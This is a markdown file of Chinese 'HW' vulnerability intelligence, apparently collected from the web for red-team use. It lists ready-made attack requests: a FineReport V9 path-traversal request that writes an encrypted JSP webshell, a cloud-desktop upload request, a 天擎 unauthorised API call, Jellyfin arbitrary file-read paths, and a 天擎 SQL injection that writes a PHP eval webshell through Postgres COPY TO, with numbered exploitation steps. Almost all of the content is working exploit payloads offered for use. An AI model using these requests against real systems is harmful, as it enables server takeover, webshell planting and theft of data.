Skip to content

Latest commit

 

History

History
65 lines (51 loc) · 2.75 KB

HW漏洞情报4-8.md

File metadata and controls

65 lines (51 loc) · 2.75 KB

信息来源:网上收集

帆软 V9getshell FineReport V9

POST /WebReport/ReportServer? op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp HTTP/1.1
Host: 192.168.169.138:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Connection: close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length: 675
{"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"pass\")!=null) {String k=(\"\"+UUID.randomUUID()).replace(\"- \",\"\").substring(16);session.putValue(\"u\",k);out.print(k);return;}Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}

和信创天云桌面命令执行

POST /Upload/upload_file.php?l=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.428 Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 164
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/avif
1
------WebKitFormBoundaryfcKRltGv--

天擎api越权访问

GET /api/dbstat/gettablessize HTTP/1.1

Jellyfin任意文件读取

利用脚本

GET /Audio/anything/hls/..datajellyfin.db/stream.mp3/ HTTP/1.1
GET /Videos/anything/hls/m/..datajellyfin.db HTTP/1.1
GET /Videos/anything/hls/..datajellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1

天擎-前台sql注入

https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:Program Files (x86)360skylar6www1.php';drop table O;--

利用过程:

  1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell

  2. 通过注入点,创建一张表 O

  3. 为 表O 添加一个新字段 T 并且写入shell内容

  4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)

  5. 删除 表O